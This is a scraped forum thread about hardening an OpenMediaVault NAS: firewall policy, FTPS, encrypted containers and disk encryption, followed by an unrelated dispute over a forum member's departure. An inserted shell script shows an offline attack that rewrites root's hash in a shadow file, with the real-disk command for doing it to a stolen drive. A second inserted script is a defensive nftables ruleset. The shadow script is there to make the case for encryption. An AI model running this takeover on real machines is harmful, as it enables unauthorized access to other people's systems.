mc, cp, mv...
I personally use a container instead of encrypting the entire disk. I don't mount it in OMV; I just provide the container via SMB and mount it locally on the end PC.
By "mounted" do you mean also decrypted?
Firewall rules are generally a very complex issue, and only a few users are familiar with them.
Yes and no. I would rather not call a few simple rules for the average home user complicated, no matter which firewall or operating system. We are not building a set of rules here for a large, complex network where the threat level is high.
It always makes me sad how few people use a firewall. It is not about complicated rule sets but rather a simple in/out control policy and awareness of what the user's computer or network is doing. If SOHO routers did not have NAT, the situation would be absurd, given the number of publicly reachable services people would have without being aware of what their computer is doing.
Of course, I advise against copy/pasting without knowing at least roughly what the rules do, because you can block or open something you did not intend to.
Unfortunately, a very large number of guides on the web are now quite outdated and often introduce more errors into the user's thinking.
In my opinion, a firewall should be treated like a door with locks, and this is how the user should think about it. But even in the Linux world there is a narrative that a firewall is not especially needed for a novice user, and so you never develop the habit of using and learning it.
The question is whether you need FTP to be publicly available to the whole world. If not, block all IPs and allow only those that belong to you and need access to FTP. The same goes for other services you have running in OMV!
If something does not have to be reachable from outside your LAN, block access to it. If you need access to your OMV from somewhere outside your LAN, maybe consider ZeroTier or a VPN.
I have already published firewall rules in this forum. If you're interested, you can search for them. But nobody was interested ...
And of course, always make sure that the software is up to date and that there is no anonymous access to services.
Your car is publicly accessible. Anyone can touch it. No law prohibits this. To prevent that, put it in a private, guarded garage!!!
CHTD, Chunghwa Telecom Co.,Ltd.
Taipei, Taiwan, 100
China Unicom Shandong Province Network
You exposed the service to the touch of the world, so various strange things will touch it. Limit the IP range using a firewall or hide FTP behind NAT. If you have to expose the service to the world, take into account that all kinds of BS will try to connect. If your car is standing on the street, anyone passing by can simply touch it and check whether the doors are locked or can be opened.
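The two posts above (block FTP for everyone except your own IPs, keep everything else LAN-only) as a worked ruleset. This is an added example, not rules published by anyone in the thread; the LAN range, the remote IP (from the TEST-NET-3 documentation block), the passive port range and the service ports are all assumptions for illustration, and the ruleset is nftables as shipped with Debian-based OMV. The `check_ruleset` function catches the copy/paste mistake the thread warns about, an FTP accept rule that somehow lost its source restriction; nothing is applied unless you run the script with `apply` as root.

```shell
#!/bin/sh
# Added example (not from the thread): an nftables ruleset for an OMV box that
# keeps FTPS reachable only from an allow-list and everything else LAN-only.
# All addresses and ports below are assumptions for illustration.
LAN_NET="${LAN_NET:-192.168.1.0/24}"                # assumed home LAN
REMOTE_ALLOWED="${REMOTE_ALLOWED:-203.0.113.10}"    # assumed remote IP (TEST-NET-3 range)
PASV_RANGE="${PASV_RANGE:-50000-50100}"             # assumed passive range configured in the FTP server

# Emit the ruleset as text. Nothing is applied here, so this is safe to run anywhere.
build_ruleset() {
    cat <<EOF
flush ruleset
table inet filter {
    set ftp_allowed {
        type ipv4_addr
        flags interval
        elements = { ${LAN_NET}, ${REMOTE_ALLOWED} }
    }
    chain input {
        type filter hook input priority 0; policy drop;
        ct state established,related accept
        ct state invalid drop
        iif lo accept
        ip protocol icmp accept
        ip6 nexthdr icmpv6 accept
        # FTPS: control port plus the passive data range, allow-list only.
        # With TLS the conntrack FTP helper cannot read PASV, so the range must be explicit.
        ip saddr @ftp_allowed tcp dport { 21, ${PASV_RANGE} } accept
        # SSH, OMV web UI, SMB: LAN only, never from the internet.
        ip saddr ${LAN_NET} tcp dport { 22, 80, 443, 445 } accept
        # Anything else hits the drop policy; keep a rate-limited trace of it.
        limit rate 5/minute log prefix "nft-input-drop: "
    }
    chain forward {
        type filter hook forward priority 0; policy drop;
    }
    chain output {
        type filter hook output priority 0; policy accept;
    }
}
EOF
}

# Guard against the classic copy/paste mistake: an FTP accept rule with no source restriction.
# Returns 0 when every rule accepting port 21 is scoped to the allow-list set.
check_ruleset() {
    unscoped=$(build_ruleset | grep -E 'tcp dport \{ 21,' | grep -vc 'saddr @ftp_allowed' || true)
    [ "$unscoped" -eq 0 ]
}

# "show" prints the text; "apply" loads it atomically with nft (run as root, nft installed).
case "${1:-}" in
    show)  build_ruleset ;;
    apply) check_ruleset && build_ruleset | nft -f - ;;
esac
```

Run `sh nft-omv.sh show` to review the text first; `nft -f -` replaces the whole ruleset in one transaction, so a typo leaves the old rules in place rather than a half-applied set. If the FTP server is configured with a different passive range, the `PASV_RANGE` variable must match it, or data connections will be dropped while the control connection works.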
Are you sure? Is physical theft of a data disk the only threat model? What about online penetration?
I would be more concerned with online threats than with physical theft, although you should protect yourself against that too.
Everything comes down to the question of what data must be available, and how and when. Does it need to be decrypted on the NAS? Can you move this vector to the user's destination machine?
If the data does not have to be directly available on the NAS, I would personally consider an encrypted container, which always remains encrypted on the NAS. No matter whether the threat is physical or online, the data is always encrypted, and the entire decryption process takes place only on the user's target machine. In this way you eliminate the consequences of online penetration and data leakage, which disk encryption does not protect against.
Since you are afraid of data leakage through physical theft, you should be even more afraid of an online leak, which is more likely to occur.
On the NAS, an encrypted VeraCrypt container which you mount on your machine via SMB/NFS. In this way, the only place the data is exposed when decrypted is the user's machine, which limits the attack vectors and the amount of time the data is exposed to leakage.
And yes, the HC2 seems a good choice, if a bit overkill.
Indeed, I already own one, which I am using as an OMV NAS machine for general repository purposes. Adding a second would be fine.
Its sole drawback (as a NAS) is its tendency to overheat a bit, but I presume that my mail server application would not stress it anyway, so...
If you don't want the HC2, then maybe the NanoPi NEO. Or rent a dedicated server or VPS.
If HC2 is too hot then https://www.amazon.com/ARCTIC-…le-Portable/dp/B003XN24GY
Maybe try a symlink...
I have no experience with an SBC as a mail server, but maybe the Odroid HC2. Or some Atom ... $
Only when you take a tea break.
Changing the root password on an unencrypted disk is just pasting a new hash into shadow...
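The post above in working form, as an added example that is not from the thread: with an unencrypted disk attached to another machine, the attacker mounts the root filesystem and rewrites the password field in `etc/shadow`, so the NAS login offers no protection against physical theft. The shadow file below is a constructed sample in a temporary directory, the replacement hash is a made-up placeholder, and the real-disk commands are shown only in a comment; nothing here touches the live system.

```shell
#!/bin/sh
# Added example (not from the thread): offline root password replacement on an
# unencrypted disk, run against a constructed copy of /etc/shadow in a temp dir.

# Constructed shadow file standing in for etc/shadow on the stolen disk.
make_sample_shadow() {
    cat >"$1" <<'EOF'
root:$6$abc$someoldhash:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
omvuser:$6$def$anotherhash:18000:0:99999:7:::
EOF
}

# Replace the password field (field 2) of USER in SHADOW_FILE with NEW_HASH.
# awk instead of sed: crypt hashes contain '$' and '/' and would need escaping.
set_hash() {
    shadow="$1"; user="$2"; hash="$3"
    awk -F: -v OFS=: -v u="$user" -v h="$hash" '$1 == u { $2 = h } { print }' \
        "$shadow" >"$shadow.tmp" && mv "$shadow.tmp" "$shadow"
}

# Read back the password field for USER.
get_hash() {
    awk -F: -v u="$2" '$1 == u { print $2 }' "$1"
}

# Fresh SHA-512 crypt hash for a known password (OpenSSL 1.1.1 or newer).
new_hash() {
    openssl passwd -6 "$1"
}

# Walk through the attack on the constructed sample. On a real stolen disk the
# only difference is the path:  mount /dev/sdX2 /mnt && set_hash /mnt/etc/shadow root "$(new_hash secret)"
demo() {
    dir=$(mktemp -d)
    make_sample_shadow "$dir/shadow"
    # placeholder hash, not a real crypt output
    set_hash "$dir/shadow" root '$6$salt$constructedreplacementhash'
    get_hash "$dir/shadow" root
    rm -rf "$dir"
}
```

`chroot /mnt passwd root` does the same thing with the distribution's own tools once the disk is mounted, which is why full-disk encryption (LUKS via crypttab on OMV) is the only thing that makes the stolen disk's login prompt meaningful.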
FTP for remote file access. It's a very unsafe, old protocol.
Old? Of course.
Unsafe? Well, no, only when you use it naked without TLS.
That's what FTPS exists for. I have used it for years and had no problems with session security.
The idea is to prevent access to personal information in case of a theft. Even if the drive is automatically unlocked, you would still need to log in to the NAS to get access to the files, right? And if the drive is removed from the case, it would be encrypted. So I will look into crypttab for this purpose; thanks for the pointer.
But perhaps I need to learn how others are dealing with drive encryption, as there might be an easier way for my use case.
I am planning to access the NAS from remote locations via FTP, but maybe I can use another method, which would allow me to run a script remotely to unlock and mount the drive only when needed? I need this to be "wife"-ready, so automation is key.
FTPS, SFTP, Nextcloud.
The more you put the system out into the world, the more likely it is that someone will get inside.
SMB exposed to the world is asking for trouble. Do you really need so many things reachable from outside the LAN?
Set up a VPN server and connect to the LAN resources. Or use ZeroTier.
You claim to have sensitive data ... Do you actually have it? If so, start thinking about separation and encryption.
A separate machine only for sensitive data, with only the service(s) that are absolutely necessary, nothing more. Keep the data encrypted, either the entire disk or a container. Ideally, the data should be in such a form that the NAS never has it decrypted.
Even if an attack on the NAS succeeds, the attacker will only get encrypted data. All decryption should rather take place on the user's target machine, and the NAS should only be treated as a storage site for the encrypted content.
For me, that's not the point. He was certainly often right on the technical questions. But it was the way he taught it. That is not appropriate behavior for a moderator.
So you judge someone by the way he behaves and do not take the technical reasons into account. But is that actually a fully adequate evaluation model? People are hypersensitive now. They often do not understand the other side. In the IT world such behavior is not unusual.
Personally, I have worked with very difficult characters with big egos, but at the end of the day technical efficiency counts, not whether I like someone for being a nice person.
The problem is, he has a long history of this behavior on forums. It's no secret; the threads have been linked here many times. If it's not crashtest, it's someone else.
To anyone willing to overlook his intellect, this makes it painfully obvious who the problem was. I don't think crashtest was completely innocent; even he admits he goaded him a bit recently, but only due to his constant attacks virtually anywhere he posted.
I don't know. I have never been part of this conflict; I don't know the case so deeply ....
Logically, I think it was possible to try to solve the situation in a different way. But apparently for many the solution to the problem, at the end of the day, is his departure. Problem solved .... there will be no more conflict.
It is unfortunate that adults cannot work out a compromise and coexist in each other's presence.
The point I'm trying to make is that @tkaiser is always right in his own opinion; no one else's opinion or ways of doing things count.
I have been asked to put together a troubleshooting guide for RAID. I have made a start, but at present it's sitting on a back burner. Why? Simply because I do not have the patience to deal with someone like @crashtest has had to deal with in relation to his guide and any other assistance he has given to users.
Hmmm, I do not know him well enough to put forward such theses. But if you say so... I have doubts whether it really is 100%.
Certainly, character and ego play a big role in the way people communicate and approach others, but ... I'm talking more about technical queries here. That someone would show me this untrue statement directed by @tkaiser at others.
If you claim he was never right ... it would mean that his knowledge is extremely low, which again somehow contradicts the facts.
I can understand a harsh approach, but does it mean that he has never been right?
I have the impression that some judge him through the prism of personal like/dislike, and not the actual state of technically right/not right.
I disagree too. It's not what you say, but how you say it.
You do not agree. Everyone does not agree. So many of you think that @tkaiser is such....
But somehow no one gives particulars when I ask for them. Only loose opinions without any details.
Fine, never mind. He's leaving here anyway. Now it will probably be a much nicer place, according to some people. And the technical level will probably increase. And the contribution to OMV/ARM will be as big as ever.
Typically, the fault in such situations is not 100% on one side only. But if you disagree, maybe I do not know about everything ... now it will probably be a better place here without @tkaiser, judging by some statements.